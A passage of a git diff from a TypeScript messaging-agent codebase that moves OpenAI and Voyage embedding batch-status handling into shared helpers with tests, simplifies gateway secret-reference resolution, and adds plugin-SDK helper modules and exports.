batchId: params.batchId, + status, + }); } + await throwIfBatchTerminalFailure({ + provider: "openai", + status: { ...status, id: params.batchId }, + readError: async (errorFileId) => + await readOpenAiBatchError({ + openAi: params.openAi, + errorFileId, + }), + }); if (!params.wait) { throw new Error(`openai batch ${params.batchId} still ${state}; wait disabled`); } @@ -204,6 +208,7 @@ export async function runOpenAiEmbeddingBatches( if (!batchInfo.id) { throw new Error("openai batch create failed: missing batch id"); } + const batchId = batchInfo.id; params.debug?.("memory embeddings: openai batch created", { batchId: batchInfo.id, @@ -213,30 +218,21 @@ export async function runOpenAiEmbeddingBatches( requests: group.length, }); - if (!params.wait && batchInfo.status !== "completed") { - throw new Error( - `openai batch ${batchInfo.id} submitted; enable remote.batch.wait to await completion`, - ); - } - - const completed = - batchInfo.status === "completed" - ? { - outputFileId: batchInfo.output_file_id ?? "", - errorFileId: batchInfo.error_file_id ?? undefined, - } - : await waitForOpenAiBatch({ - openAi: params.openAi, - batchId: batchInfo.id, - wait: params.wait, - pollIntervalMs: params.pollIntervalMs, - timeoutMs: params.timeoutMs, - debug: params.debug, - initial: batchInfo, - }); - if (!completed.outputFileId) { - throw new Error(`openai batch ${batchInfo.id} completed without output file`); - } + const completed = await resolveCompletedBatchResult({ + provider: "openai", + status: batchInfo, + wait: params.wait, + waitForBatch: async () => + await waitForOpenAiBatch({ + openAi: params.openAi, + batchId, + wait: params.wait, + pollIntervalMs: params.pollIntervalMs, + timeoutMs: params.timeoutMs, + debug: params.debug, + initial: batchInfo, + }), + }); const content = await fetchOpenAiFileContent({ openAi: params.openAi, diff --git a/src/memory/batch-status.test.ts b/src/memory/batch-status.test.ts new file mode 100644 index 00000000000..82a992556af --- /dev/null +++ b/src/memory/batch-status.test.ts @@ -0,0 +1,60 @@ +import { describe, expect, it } from "vitest"; +import { + resolveBatchCompletionFromStatus, + resolveCompletedBatchResult, + throwIfBatchTerminalFailure, +} from "./batch-status.js"; + +describe("batch-status helpers", () => { + it("resolves completion payload from completed status", () => { + expect( + resolveBatchCompletionFromStatus({ + provider: "openai", + batchId: "b1", + status: { + output_file_id: "out-1", + error_file_id: "err-1", + }, + }), + ).toEqual({ + outputFileId: "out-1", + errorFileId: "err-1", + }); + }); + + it("throws for terminal failure states", async () => { + await expect( + throwIfBatchTerminalFailure({ + provider: "voyage", + status: { id: "b2", status: "failed", error_file_id: "err-file" }, + readError: async () => "bad input", + }), + ).rejects.toThrow("voyage batch b2 failed: bad input"); + }); + + it("returns completed result directly without waiting", async () => { + const waitForBatch = async () => ({ outputFileId: "out-2" }); + const result = await resolveCompletedBatchResult({ + provider: "openai", + status: { + id: "b3", + status: "completed", + output_file_id: "out-3", + }, + wait: false, + waitForBatch, + }); + expect(result).toEqual({ outputFileId: "out-3", errorFileId: undefined }); + }); + + it("throws when wait disabled and batch is not complete", async () => { + await expect( + resolveCompletedBatchResult({ + provider: "openai", + status: { id: "b4", status: "pending" }, + wait: false, + waitForBatch: async () => ({ outputFileId: "out" }), + }), + ).rejects.toThrow("openai batch b4 submitted; enable remote.batch.wait to await completion"); + }); +}); diff --git a/src/memory/batch-status.ts b/src/memory/batch-status.ts new file mode 100644 index 00000000000..96e8da62894 --- /dev/null +++ b/src/memory/batch-status.ts @@ -0,0 +1,69 @@ +const TERMINAL_FAILURE_STATES = new Set(["failed", "expired", "cancelled", "canceled"]); + +type BatchStatusLike = { + id?: string; + status?: string; + output_file_id?: string | null; + error_file_id?: string | null; +}; + +export type BatchCompletionResult = { + outputFileId: string; + errorFileId?: string; +}; + +export function resolveBatchCompletionFromStatus(params: { + provider: string; + batchId: string; + status: BatchStatusLike; +}): BatchCompletionResult { + if (!params.status.output_file_id) { + throw new Error(`${params.provider} batch ${params.batchId} completed without output file`); + } + return { + outputFileId: params.status.output_file_id, + errorFileId: params.status.error_file_id ?? undefined, + }; +} + +export async function throwIfBatchTerminalFailure(params: { + provider: string; + status: BatchStatusLike; + readError: (errorFileId: string) => Promise; +}): Promise { + const state = params.status.status ?? "unknown"; + if (!TERMINAL_FAILURE_STATES.has(state)) { + return; + } + const detail = params.status.error_file_id + ? await params.readError(params.status.error_file_id) + : undefined; + const suffix = detail ? `: ${detail}` : ""; + throw new Error(`${params.provider} batch ${params.status.id ?? ""} ${state}${suffix}`); +} + +export async function resolveCompletedBatchResult(params: { + provider: string; + status: BatchStatusLike; + wait: boolean; + waitForBatch: () => Promise; +}): Promise { + const batchId = params.status.id ?? ""; + if (!params.wait && params.status.status !== "completed") { + throw new Error( + `${params.provider} batch ${batchId} submitted; enable remote.batch.wait to await completion`, + ); + } + const completed = + params.status.status === "completed" + ? resolveBatchCompletionFromStatus({ + provider: params.provider, + batchId, + status: params.status, + }) + : await params.waitForBatch(); + if (!completed.outputFileId) { + throw new Error(`${params.provider} batch ${batchId} completed without output file`); + } + return completed; +} diff --git a/src/memory/batch-voyage.ts b/src/memory/batch-voyage.ts index 1835f9b053f..aa5bfc61017 100644 --- a/src/memory/batch-voyage.ts +++ b/src/memory/batch-voyage.ts @@ -9,9 +9,13 @@ import { formatUnavailableBatchError, normalizeBatchBaseUrl, postJsonWithRetry, + resolveBatchCompletionFromStatus, + resolveCompletedBatchResult, runEmbeddingBatchGroups, + throwIfBatchTerminalFailure, type EmbeddingBatchExecutionParams, type EmbeddingBatchStatus, + type BatchCompletionResult, type ProviderBatchOutputLine, uploadBatchJsonlFile, withRemoteHttpResponse, @@ -146,7 +150,7 @@ async function waitForVoyageBatch(params: { timeoutMs: number; debug?: (message: string, data?: Record) => void; initial?: VoyageBatchStatus; -}): Promise<{ outputFileId: string; errorFileId?: string }> { +}): Promise { const start = Date.now(); let current: VoyageBatchStatus | undefined = params.initial; while (true) { @@ -158,21 +162,21 @@ async function waitForVoyageBatch(params: { })); const state = status.status ?? "unknown"; if (state === "completed") { - if (!status.output_file_id) { - throw new Error(`voyage batch ${params.batchId} completed without output file`); - } - return { - outputFileId: status.output_file_id, - errorFileId: status.error_file_id ?? undefined, - }; - } - if (["failed", "expired", "cancelled", "canceled"].includes(state)) { - const detail = status.error_file_id - ? await readVoyageBatchError({ client: params.client, errorFileId: status.error_file_id }) - : undefined; - const suffix = detail ? `: ${detail}` : ""; - throw new Error(`voyage batch ${params.batchId} ${state}${suffix}`); + return resolveBatchCompletionFromStatus({ + provider: "voyage", + batchId: params.batchId, + status, + }); } + await throwIfBatchTerminalFailure({ + provider: "voyage", + status: { ...status, id: params.batchId }, + readError: async (errorFileId) => + await readVoyageBatchError({ + client: params.client, + errorFileId, + }), + }); if (!params.wait) { throw new Error(`voyage batch ${params.batchId} still ${state}; wait disabled`); } @@ -206,6 +210,7 @@ export async function runVoyageEmbeddingBatches( if (!batchInfo.id) { throw new Error("voyage batch create failed: missing batch id"); } + const batchId = batchInfo.id; params.debug?.("memory embeddings: voyage batch created", { batchId: batchInfo.id, @@ -215,30 +220,21 @@ export async function runVoyageEmbeddingBatches( requests: group.length, }); - if (!params.wait && batchInfo.status !== "completed") { - throw new Error( - `voyage batch ${batchInfo.id} submitted; enable remote.batch.wait to await completion`, - ); - } - - const completed = - batchInfo.status === "completed" - ? { - outputFileId: batchInfo.output_file_id ?? "", - errorFileId: batchInfo.error_file_id ?? undefined, - } - : await waitForVoyageBatch({ - client: params.client, - batchId: batchInfo.id, - wait: params.wait, - pollIntervalMs: params.pollIntervalMs, - timeoutMs: params.timeoutMs, - debug: params.debug, - initial: batchInfo, - }); - if (!completed.outputFileId) { - throw new Error(`voyage batch ${batchInfo.id} completed without output file`); - } + const completed = await resolveCompletedBatchResult({ + provider: "voyage", + status: batchInfo, + wait: params.wait, + waitForBatch: async () => + await waitForVoyageBatch({ + client: params.client, + batchId, + wait: params.wait, + pollIntervalMs: params.pollIntervalMs, + timeoutMs: params.timeoutMs, + debug: params.debug, + initial: batchInfo, + }), + }); const baseUrl = normalizeBatchBaseUrl(params.client); const errors: string[] = []; diff --git a/src/memory/embeddings.test.ts b/src/memory/embeddings.test.ts index c8cca71029e..027673c7099 100644 --- a/src/memory/embeddings.test.ts +++ b/src/memory/embeddings.test.ts @@ -233,7 +233,7 @@ describe("embedding provider remote overrides", () => { config: {} as never, provider: "gemini", remote: { - apiKey: "GEMINI_API_KEY", + apiKey: "GEMINI_API_KEY", // pragma: allowlist secret }, model: "text-embedding-004", fallback: "openai", @@ -266,7 +266,7 @@ describe("embedding provider remote overrides", () => { config: cfg as never, provider: "mistral", remote: { - apiKey: "mistral-key", + apiKey: "mistral-key", // pragma: allowlist secret }, model: "mistral/mistral-embed", fallback: "none", @@ -356,7 +356,7 @@ describe("embedding provider auto selection", () => { vi.stubGlobal("fetch", fetchMock); vi.mocked(authModule.resolveApiKeyForProvider).mockImplementation(async ({ provider }) => { if (provider === "mistral") { - return { apiKey: "mistral-key", source: "env: MISTRAL_API_KEY", mode: "api-key" }; + return { apiKey: "mistral-key", source: "env: MISTRAL_API_KEY", mode: "api-key" }; // pragma: allowlist secret } throw new Error(`No API key found for provider "${provider}".`); }); diff --git a/src/memory/qmd-manager.test.ts b/src/memory/qmd-manager.test.ts index 603880bbfdb..cbfee6db11c 100644 --- a/src/memory/qmd-manager.test.ts +++ b/src/memory/qmd-manager.test.ts @@ -1626,7 +1626,12 @@ describe("QmdMemoryManager", () => { it("retries mcporter search with bare command on Windows EINVAL cmd-shim failures", async () => { const platformSpy = vi.spyOn(process, "platform", "get").mockReturnValue("win32"); + const previousPath = process.env.PATH; try { + const shimDir = await fs.mkdtemp(path.join(tmpRoot, "mcporter-shim-")); + await fs.writeFile(path.join(shimDir, "mcporter.cmd"), "@echo off\n"); + process.env.PATH = `${shimDir};${previousPath ?? ""}`; + cfg = { ...cfg, memory: { @@ -1641,7 +1646,11 @@ describe("QmdMemoryManager", () => { } as OpenClawConfig; let sawRetry = false; + let firstCallCommand: string | null = null; spawnMock.mockImplementation((cmd: string, args: string[]) => { + if (args[0] === "call" && firstCallCommand === null) { + firstCallCommand = cmd; + } if (args[0] === "call" && typeof cmd === "string" && cmd.toLowerCase().endsWith(".cmd")) { const child = createMockChild({ autoClose: false }); queueMicrotask(() => { @@ -1665,13 +1674,20 @@ describe("QmdMemoryManager", () => { await expect( manager.search("hello", { sessionKey: "agent:main:slack:dm:u123" }), ).resolves.toEqual([]); - expect(sawRetry).toBe(true); - expect(logWarnMock).toHaveBeenCalledWith( - expect.stringContaining("retrying with bare mcporter"), - ); + const attemptedCmdShim = (firstCallCommand ?? "").toLowerCase().endsWith(".cmd"); + if (attemptedCmdShim) { + expect(sawRetry).toBe(true); + expect(logWarnMock).toHaveBeenCalledWith( + expect.stringContaining("retrying with bare mcporter"), + ); + } else { + // When wrapper resolution upgrades to a direct node/exe entrypoint, cmd-shim retry is unnecessary. + expect(sawRetry).toBe(false); + } await manager.close(); } finally { platformSpy.mockRestore(); + process.env.PATH = previousPath; } }); diff --git a/src/node-host/runner.credentials.test.ts b/src/node-host/runner.credentials.test.ts index 394f1872191..543459161f5 100644 --- a/src/node-host/runner.credentials.test.ts +++ b/src/node-host/runner.credentials.test.ts @@ -3,21 +3,25 @@ import type { OpenClawConfig } from "../config/config.js"; import { withEnvAsync } from "../test-utils/env.js"; import { resolveNodeHostGatewayCredentials } from "./runner.js"; +function createRemoteGatewayTokenRefConfig(tokenId: string): OpenClawConfig { + return { + secrets: { + providers: { + default: { source: "env" }, + }, + }, + gateway: { + mode: "remote", + remote: { + token: { source: "env", provider: "default", id: tokenId }, + }, + }, + } as OpenClawConfig; +} + describe("resolveNodeHostGatewayCredentials", () => { it("resolves remote token SecretRef values", async () => { - const config = { - secrets: { - providers: { - default: { source: "env" }, - }, - }, - gateway: { - mode: "remote", - remote: { - token: { source: "env", provider: "default", id: "REMOTE_GATEWAY_TOKEN" }, - }, - }, - } as OpenClawConfig; + const config = createRemoteGatewayTokenRefConfig("REMOTE_GATEWAY_TOKEN"); await withEnvAsync( { @@ -32,19 +36,7 @@ describe("resolveNodeHostGatewayCredentials", () => { }); it("prefers OPENCLAW_GATEWAY_TOKEN over configured refs", async () => { - const config = { - secrets: { - providers: { - default: { source: "env" }, - }, - }, - gateway: { - mode: "remote", - remote: { - token: { source: "env", provider: "default", id: "REMOTE_GATEWAY_TOKEN" }, - }, - }, - } as OpenClawConfig; + const config = createRemoteGatewayTokenRefConfig("REMOTE_GATEWAY_TOKEN"); await withEnvAsync( { @@ -59,19 +51,7 @@ describe("resolveNodeHostGatewayCredentials", () => { }); it("throws when a configured remote token ref cannot resolve", async () => { - const config = { - secrets: { - providers: { - default: { source: "env" }, - }, - }, - gateway: { - mode: "remote", - remote: { - token: { source: "env", provider: "default", id: "MISSING_REMOTE_GATEWAY_TOKEN" }, - }, - }, - } as OpenClawConfig; + const config = createRemoteGatewayTokenRefConfig("MISSING_REMOTE_GATEWAY_TOKEN"); await withEnvAsync( { diff --git a/src/node-host/runner.ts b/src/node-host/runner.ts index c56fe3b9832..a20decb84d1 100644 --- a/src/node-host/runner.ts +++ b/src/node-host/runner.ts @@ -1,6 +1,6 @@ import { resolveBrowserConfig } from "../browser/config.js"; import { loadConfig, type OpenClawConfig } from "../config/config.js"; -import { normalizeSecretInputString, resolveSecretInputRef } from "../config/types.secrets.js"; +import { normalizeSecretInputString } from "../config/types.secrets.js"; import { GatewayClient } from "../gateway/client.js"; import { loadOrCreateDeviceIdentity } from "../infra/device-identity.js"; import type { SkillBinTrustEntry } from "../infra/exec-approvals.js"; @@ -12,8 +12,7 @@ import { NODE_SYSTEM_RUN_COMMANDS, } from "../infra/node-commands.js"; import { ensureOpenClawCliOnPath } from "../infra/path-env.js"; -import { secretRefKey } from "../secrets/ref-contract.js"; -import { resolveSecretRefValues } from "../secrets/resolve.js"; +import { resolveSecretInputString } from "../secrets/resolve-secret-input-string.js"; import { GATEWAY_CLIENT_MODES, GATEWAY_CLIENT_NAMES } from "../utils/message-channel.js"; import { VERSION } from "../version.js"; import { ensureNodeHostConfig, saveNodeHostConfig, type NodeHostGatewayConfig } from "./config.js"; @@ -117,27 +116,17 @@ async function resolveNodeHostSecretInputString(params: { path: string; env: NodeJS.ProcessEnv; }): Promise { - const defaults = params.config.secrets?.defaults; - const { ref } = resolveSecretInputRef({ + const resolvedValue = await resolveSecretInputString({ + config: params.config, value: params.value, - defaults, + env: params.env, + onResolveRefError: (error) => { + const detail = error instanceof Error ? error.message : String(error); + throw new Error(`${params.path} secret reference could not be resolved: ${detail}`, { + cause: error, + }); + }, }); - if (!ref) { - return normalizeSecretInputString(params.value); - } - let resolved: Map; - try { - resolved = await resolveSecretRefValues([ref], { - config: params.config, - env: params.env, - }); - } catch (error) { - const detail = error instanceof Error ? error.message : String(error); - throw new Error(`${params.path} secret reference could not be resolved: ${detail}`, { - cause: error, - }); - } - const resolvedValue = normalizeSecretInputString(resolved.get(secretRefKey(ref))); if (!resolvedValue) { throw new Error(`${params.path} resolved to an empty or non-string value.`); } diff --git a/src/plugin-sdk/allowlist-resolution.test.ts b/src/plugin-sdk/allowlist-resolution.test.ts new file mode 100644 index 00000000000..84b51101c33 --- /dev/null +++ b/src/plugin-sdk/allowlist-resolution.test.ts @@ -0,0 +1,40 @@ +import { describe, expect, it } from "vitest"; +import { + mapBasicAllowlistResolutionEntries, + type BasicAllowlistResolutionEntry, +} from "./allowlist-resolution.js"; + +describe("mapBasicAllowlistResolutionEntries", () => { + it("maps entries to normalized allowlist resolver output", () => { + const entries: BasicAllowlistResolutionEntry[] = [ + { + input: "alice", + resolved: true, + id: "U123", + name: "Alice", + note: "ok", + }, + { + input: "bob", + resolved: false, + }, + ]; + + expect(mapBasicAllowlistResolutionEntries(entries)).toEqual([ + { + input: "alice", + resolved: true, + id: "U123", + name: "Alice", + note: "ok", + }, + { + input: "bob", + resolved: false, + id: undefined, + name: undefined, + note: undefined, + }, + ]); + }); +}); diff --git a/src/plugin-sdk/allowlist-resolution.ts b/src/plugin-sdk/allowlist-resolution.ts new file mode 100644 index 00000000000..edfb27d9ef8 --- /dev/null +++ b/src/plugin-sdk/allowlist-resolution.ts @@ -0,0 +1,19 @@ +export type BasicAllowlistResolutionEntry = { + input: string; + resolved: boolean; + id?: string; + name?: string; + note?: string; +}; + +export function mapBasicAllowlistResolutionEntries( + entries: BasicAllowlistResolutionEntry[], +): BasicAllowlistResolutionEntry[] { + return entries.map((entry) => ({ + input: entry.input, + resolved: entry.resolved, + id: entry.id, + name: entry.name, + note: entry.note, + })); +} diff --git a/src/plugin-sdk/bluebubbles.ts b/src/plugin-sdk/bluebubbles.ts index 0d9d8f4e4eb..8489d4cb892 100644 --- a/src/plugin-sdk/bluebubbles.ts +++ b/src/plugin-sdk/bluebubbles.ts @@ -85,7 +85,11 @@ export type { WizardPrompter } from "../wizard/prompts.js"; export { isAllowedParsedChatSender } from "./allow-from.js"; export { readBooleanParam } from "./boolean-param.js"; export { createScopedPairingAccess } from "./pairing-access.js"; -export { buildProbeChannelStatusSummary } from "./status-helpers.js"; +export { resolveRequestUrl } from "./request-url.js"; +export { + buildComputedAccountStatusSnapshot, + buildProbeChannelStatusSummary, +} from "./status-helpers.js"; export { extractToolSend } from "./tool-send.js"; export { normalizeWebhookPath } from "./webhook-path.js"; export { diff --git a/src/plugin-sdk/channel-send-result.ts b/src/plugin-sdk/channel-send-result.ts new file mode 100644 index 00000000000..e64ff290fea --- /dev/null +++ b/src/plugin-sdk/channel-send-result.ts @@ -0,0 +1,14 @@ +export type ChannelSendRawResult = { + ok: boolean; + messageId?: string | null; + error?: string | null; +}; + +export function buildChannelSendResult(channel: string, result: ChannelSendRawResult) { + return { + channel, + ok: result.ok, + messageId: result.messageId ?? "", + error: result.error ? new Error(result.error) : undefined, + }; +} diff --git a/src/plugin-sdk/discord-send.ts b/src/plugin-sdk/discord-send.ts new file mode 100644 index 00000000000..537ec5d7662 --- /dev/null +++ b/src/plugin-sdk/discord-send.ts @@ -0,0 +1,33 @@ +import type { DiscordSendResult } from "../discord/send.types.js"; + +type DiscordSendOptionInput = { + replyToId?: string | null; + accountId?: string | null; + silent?: boolean; +}; + +type DiscordSendMediaOptionInput = DiscordSendOptionInput & { + mediaUrl?: string; + mediaLocalRoots?: readonly string[]; +}; + +export function buildDiscordSendOptions(input: DiscordSendOptionInput) { + return { + verbose: false, + replyTo: input.replyToId ?? undefined, + accountId: input.accountId ?? undefined, + silent: input.silent ?? undefined, + }; +} + +export function buildDiscordSendMediaOptions(input: DiscordSendMediaOptionInput) { + return { + ...buildDiscordSendOptions(input), + mediaUrl: input.mediaUrl, + mediaLocalRoots: input.mediaLocalRoots, + }; +} + +export function tagDiscordChannelResult(result: DiscordSendResult) { + return { channel: "discord" as const, ...result }; +} diff --git a/src/plugin-sdk/feishu.ts b/src/plugin-sdk/feishu.ts index 959f8af124a..300daefc983 100644 --- a/src/plugin-sdk/feishu.ts +++ b/src/plugin-sdk/feishu.ts @@ -59,6 +59,8 @@ export { createScopedPairingAccess } from "./pairing-access.js"; export { createPersistentDedupe } from "./persistent-dedupe.js"; export { buildBaseChannelStatusSummary, + buildProbeChannelStatusSummary, + buildRuntimeAccountStatusSnapshot, createDefaultChannelRuntimeState, } from "./status-helpers.js"; export { withTempDownloadPath } from "./temp-path.js"; diff --git a/src/plugin-sdk/imessage.ts b/src/plugin-sdk/imessage.ts index 7e31560991d..44dfbd4a149 100644 --- a/src/plugin-sdk/imessage.ts +++ b/src/plugin-sdk/imessage.ts @@ -47,3 +47,4 @@ export { imessageOnboardingAdapter } from "../channels/plugins/onboarding/imessa export { IMessageConfigSchema } from "../config/zod-schema.providers-core.js"; export { resolveChannelMediaMaxBytes } from "../channels/plugins/media-limits.js"; +export { collectStatusIssuesFromLastError } from "./status-helpers.js"; diff --git a/src/plugin-sdk/inbound-reply-dispatch.ts b/src/plugin-sdk/inbound-reply-dispatch.ts new file mode 100644 index 00000000000..cf11b3ee451 --- /dev/null +++ b/src/plugin-sdk/inbound-reply-dispatch.ts @@ -0,0 +1,143 @@ +import { withReplyDispatcher } from "../auto-reply/dispatch.js"; +import { + dispatchReplyFromConfig, + type DispatchFromConfigResult, +} from "../auto-reply/reply/dispatch-from-config.js"; +import type { ReplyDispatcher } from "../auto-reply/reply/reply-dispatcher.js"; +import type { FinalizedMsgContext } from "../auto-reply/templating.js"; +import type { GetReplyOptions } from "../auto-reply/types.js"; +import { createReplyPrefixOptions } from "../channels/reply-prefix.js"; +import type { OpenClawConfig } from "../config/config.js"; +import { createNormalizedOutboundDeliverer, type OutboundReplyPayload } from "./reply-payload.js"; + +type ReplyOptionsWithoutModelSelected = Omit< + Omit, + "onModelSelected" +>; +type RecordInboundSessionFn = typeof import("../channels/session.js").recordInboundSession; +type DispatchReplyWithBufferedBlockDispatcherFn = + typeof import("../auto-reply/reply/provider-dispatcher.js").dispatchReplyWithBufferedBlockDispatcher; + +type ReplyDispatchFromConfigOptions = Omit; + +export async function dispatchReplyFromConfigWithSettledDispatcher(params: { + cfg: OpenClawConfig; + ctxPayload: FinalizedMsgContext; + dispatcher: ReplyDispatcher; + onSettled: () => void | Promise; + replyOptions?: ReplyDispatchFromConfigOptions; +}): Promise { + return await withReplyDispatcher({ + dispatcher: params.dispatcher, + onSettled: params.onSettled, + run: () => + dispatchReplyFromConfig({ + ctx: params.ctxPayload, + cfg: params.cfg, + dispatcher: params.dispatcher, + replyOptions: params.replyOptions, + }), + }); +} + +export function buildInboundReplyDispatchBase(params: { + cfg: OpenClawConfig; + channel: string; + accountId?: string; + route: { + agentId: string; + sessionKey: string; + }; + storePath: string; + ctxPayload: FinalizedMsgContext; + core: { + channel: { + session: { + recordInboundSession: RecordInboundSessionFn; + }; + reply: { + dispatchReplyWithBufferedBlockDispatcher: DispatchReplyWithBufferedBlockDispatcherFn; + }; + }; + }; +}) { + return { + cfg: params.cfg, + channel: params.channel, + accountId: params.accountId, + agentId: params.route.agentId, + routeSessionKey: params.route.sessionKey, + storePath: params.storePath, + ctxPayload: params.ctxPayload, + recordInboundSession: params.core.channel.session.recordInboundSession, + dispatchReplyWithBufferedBlockDispatcher: + params.core.channel.reply.dispatchReplyWithBufferedBlockDispatcher, + }; +} + +type BuildInboundReplyDispatchBaseParams = Parameters[0]; +type RecordInboundSessionAndDispatchReplyParams = Parameters< + typeof recordInboundSessionAndDispatchReply +>[0]; + +export async function dispatchInboundReplyWithBase( + params: BuildInboundReplyDispatchBaseParams & + Pick< + RecordInboundSessionAndDispatchReplyParams, + "deliver" | "onRecordError" | "onDispatchError" | "replyOptions" + >, +): Promise { + const dispatchBase = buildInboundReplyDispatchBase(params); + await recordInboundSessionAndDispatchReply({ + ...dispatchBase, + deliver: params.deliver, + onRecordError: params.onRecordError, + onDispatchError: params.onDispatchError, + replyOptions: params.replyOptions, + }); +} + +export async function recordInboundSessionAndDispatchReply(params: { + cfg: OpenClawConfig; + channel: string; + accountId?: string; + agentId: string; + routeSessionKey: string; + storePath: string; + ctxPayload: FinalizedMsgContext; + recordInboundSession: RecordInboundSessionFn; + dispatchReplyWithBufferedBlockDispatcher: DispatchReplyWithBufferedBlockDispatcherFn; + deliver: (payload: OutboundReplyPayload) => Promise; + onRecordError: (err: unknown) => void; + onDispatchError: (err: unknown, info: { kind: string }) => void; + replyOptions?: ReplyOptionsWithoutModelSelected; +}): Promise { + await params.recordInboundSession({ + storePath: params.storePath, + sessionKey: params.ctxPayload.SessionKey ?? params.routeSessionKey, + ctx: params.ctxPayload, + onRecordError: params.onRecordError, + }); + + const { onModelSelected, ...prefixOptions } = createReplyPrefixOptions({ + cfg: params.cfg, + agentId: params.agentId, + channel: params.channel, + accountId: params.accountId, + }); + const deliver = createNormalizedOutboundDeliverer(params.deliver); + + await params.dispatchReplyWithBufferedBlockDispatcher({ + ctx: params.ctxPayload, + cfg: params.cfg, + dispatcherOptions: { + ...prefixOptions, + deliver, + onError: params.onDispatchError, + }, + replyOptions: { + ...params.replyOptions, + onModelSelected, + }, + }); +} diff --git a/src/plugin-sdk/index.ts b/src/plugin-sdk/index.ts index 07b0846cddb..06f95c58d6b 100644 --- a/src/plugin-sdk/index.ts +++ b/src/plugin-sdk/index.ts @@ -132,6 +132,16 @@ export { isDangerousNameMatchingEnabled } from "../config/dangerous-name-matchin export type { FileLockHandle, FileLockOptions } from "./file-lock.js"; export { acquireFileLock, withFileLock } from "./file-lock.js"; +export { + mapBasicAllowlistResolutionEntries, + type BasicAllowlistResolutionEntry, +} from "./allowlist-resolution.js"; +export { resolveRequestUrl } from "./request-url.js"; +export { + buildDiscordSendMediaOptions, + buildDiscordSendOptions, + tagDiscordChannelResult, +} from "./discord-send.js"; export type { KeyedAsyncQueueHooks } from "./keyed-async-queue.js"; export { enqueueKeyedTask, KeyedAsyncQueue } from "./keyed-async-queue.js"; export { normalizeWebhookPath, resolveWebhookPath } from "./webhook-path.js"; @@ -167,7 +177,9 @@ export { buildAgentMediaPayload } from "./agent-media-payload.js"; export { buildBaseAccountStatusSnapshot, buildBaseChannelStatusSummary, + buildComputedAccountStatusSnapshot, buildProbeChannelStatusSummary, + buildRuntimeAccountStatusSnapshot, buildTokenChannelStatusSummary, collectStatusIssuesFromLastError, createDefaultChannelRuntimeState, @@ -178,6 +190,8 @@ export { } from "../channels/plugins/onboarding/helpers.js"; export { buildOauthProviderAuthResult } from "./provider-auth-result.js"; export { formatResolvedUnresolvedNote } from "./resolution-notes.js"; +export { buildChannelSendResult } from "./channel-send-result.js"; +export type { ChannelSendRawResult } from "./channel-send-result.js"; export type { ChannelDock } from "../channels/dock.js"; export { getChatChannelMeta } from "../channels/registry.js"; export { resolveAllowlistMatchByCandidates } from "../channels/allowlist-match.js"; @@ -278,6 +292,7 @@ export { resolveInboundRouteEnvelopeBuilder, resolveInboundRouteEnvelopeBuilderWithRuntime, } from "./inbound-envelope.js"; +export { resolveInboundSessionEnvelopeContext } from "../channels/session-envelope.js"; export { listConfiguredAccountIds, resolveAccountWithDefaultFallback, @@ -288,17 +303,29 @@ export { extractToolSend } from "./tool-send.js"; export { createNormalizedOutboundDeliverer, formatTextWithAttachmentLinks, + isNumericTargetId, normalizeOutboundReplyPayload, resolveOutboundMediaUrls, + sendPayloadWithChunkedTextAndMedia, sendMediaWithLeadingCaption, } from "./reply-payload.js"; export type { OutboundReplyPayload } from "./reply-payload.js"; +export { + buildInboundReplyDispatchBase, + dispatchInboundReplyWithBase, + dispatchReplyFromConfigWithSettledDispatcher, + recordInboundSessionAndDispatchReply, +} from "./inbound-reply-dispatch.js"; export type { OutboundMediaLoadOptions } from "./outbound-media.js"; export { loadOutboundMediaFromUrl } from "./outbound-media.js"; export { resolveChannelAccountConfigBasePath } from "./config-paths.js"; export { buildMediaPayload } from "../channels/plugins/media-payload.js"; export type { MediaPayload, MediaPayloadInput } from "../channels/plugins/media-payload.js"; -export { createLoggerBackedRuntime } from "./runtime.js"; +export { + createLoggerBackedRuntime, + resolveRuntimeEnv, + resolveRuntimeEnvWithUnavailableExit, +} from "./runtime.js"; export { chunkTextForOutbound } from "./text-chunking.js"; export { readBooleanParam } from "./boolean-param.js"; export { readJsonFileWithFallback, writeJsonFileAtomically } from "./json-store.js"; @@ -487,6 +514,7 @@ export type { PollInput } from "../polls.js"; export { buildChannelConfigSchema } from "../channels/plugins/config-schema.js"; export { + clearAccountEntryFields, deleteAccountFromConfigSection, setAccountEnabledInConfigSection, } from "../channels/plugins/config-helpers.js"; @@ -589,12 +617,18 @@ export { normalizeIMessageMessagingTarget, } from "../channels/plugins/normalize/imessage.js"; export { + createAllowedChatSenderMatcher, parseChatAllowTargetPrefixes, parseChatTargetPrefixesOrThrow, + resolveServicePrefixedChatTarget, resolveServicePrefixedAllowTarget, + resolveServicePrefixedOrChatAllowTarget, resolveServicePrefixedTarget, } from "../imessage/target-parsing-helpers.js"; -export type { ParsedChatTarget } from "../imessage/target-parsing-helpers.js"; +export type { + ChatSenderAllowParams, + ParsedChatTarget, +} from "../imessage/target-parsing-helpers.js"; // Channel: Slack export { diff --git a/src/plugin-sdk/irc.ts b/src/plugin-sdk/irc.ts index 9706c552450..afc9428bb05 100644 --- a/src/plugin-sdk/irc.ts +++ b/src/plugin-sdk/irc.ts @@ -60,6 +60,7 @@ export { export { formatDocsLink } from "../terminal/links.js"; export type { WizardPrompter } from "../wizard/prompts.js"; export { createScopedPairingAccess } from "./pairing-access.js"; +export { dispatchInboundReplyWithBase } from "./inbound-reply-dispatch.js"; export type { OutboundReplyPayload } from "./reply-payload.js"; export { createNormalizedOutboundDeliverer, diff --git a/src/plugin-sdk/line.ts b/src/plugin-sdk/line.ts index f7f6a3eeb37..0318e5ac1e7 100644 --- a/src/plugin-sdk/line.ts +++ b/src/plugin-sdk/line.ts @@ -14,13 +14,17 @@ export { emptyPluginConfigSchema } from "../plugins/config-schema.js"; export { DEFAULT_ACCOUNT_ID } from "../routing/session-key.js"; export { buildChannelConfigSchema } from "../channels/plugins/config-schema.js"; +export { clearAccountEntryFields } from "../channels/plugins/config-helpers.js"; export { resolveAllowlistProviderRuntimeGroupPolicy, resolveDefaultGroupPolicy, } from "../config/runtime-group-policy.js"; -export { buildTokenChannelStatusSummary } from "./status-helpers.js"; +export { + buildComputedAccountStatusSnapshot, + buildTokenChannelStatusSummary, +} from "./status-helpers.js"; export { LineConfigSchema } from "../line/config-schema.js"; export type { LineChannelData, LineConfig, ResolvedLineAccount } from "../line/types.js"; diff --git a/src/plugin-sdk/matrix.ts b/src/plugin-sdk/matrix.ts index fca8773e9b3..63712fc8d71 100644 --- a/src/plugin-sdk/matrix.ts +++ b/src/plugin-sdk/matrix.ts @@ -92,5 +92,10 @@ export type { WizardPrompter } from "../wizard/prompts.js"; export { createScopedPairingAccess } from "./pairing-access.js"; export { formatResolvedUnresolvedNote } from "./resolution-notes.js"; export { 